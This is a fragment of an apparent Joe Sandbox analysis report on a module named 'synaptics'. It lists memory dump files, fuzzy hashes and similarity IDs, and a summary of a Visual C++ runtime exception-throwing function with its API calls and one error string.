                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HashObject_
                                                                                                                                                                                                      • String ID: @Btl
                                                                                                                                                                                                      • API String ID: 555361508-3323547406
                                                                                                                                                                                                      • Opcode ID: 7076dff119f5c38524155d0b08ca178b3fd8da8518c878e043640914385dca38
                                                                                                                                                                                                      • Instruction ID: 222d8ced9500c26fdcdad1dc84f31217e39356237913ac778009b72331afcc0c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7076dff119f5c38524155d0b08ca178b3fd8da8518c878e043640914385dca38
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAD0A7794111147A86208A26DD01ECB3A2DCE01378F048314F82853A509731ED4491F2
                                                                                                                                                                                                      Function 73A8717E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 73A8718A
                                                                                                                                                                                                      • _CxxThrowException.VCRUNTIME140(?,73A8EF84), ref: 73A8719A
                                                                                                                                                                                                        • Part of subcall function 73A87550: __telemetry_main_return_trigger.VCRUNTIME140(Bad dynamic_cast!,00000000,?,?,?,73A87292,?,73A8EFF8), ref: 73A87580
                                                                                                                                                                                                        • Part of subcall function 73A87550: RaiseException.KERNEL32(E06D7363,00000001,00000003,73A87292,?,?,?,73A87292,?,73A8EFF8), ref: 73A875B0
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Access violation - no RTTI data!, xrefs: 73A87181
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Exception$RaiseThrow__telemetry_main_return_triggerstd::__non_rtti_object::__construct_from_string_literal
                                                                                                                                                                                                      • String ID: Access violation - no RTTI data!
                                                                                                                                                                                                      • API String ID: 1667904068-2158758863
                                                                                                                                                                                                      • Opcode ID: 2497eb278f02a6207884e2569c7559150a86b536397d94d9db5e2dbbe58990b4
                                                                                                                                                                                                      • Instruction ID: 23aebed21bfaf3e12f8179e3f6effad57c9c9c0b66999b4d0b0bd8ad669ac193
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2497eb278f02a6207884e2569c7559150a86b536397d94d9db5e2dbbe58990b4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4CC012328002089FDB0AD6E48607DCD73B8A908140F200553DA30A7119F726FE544B21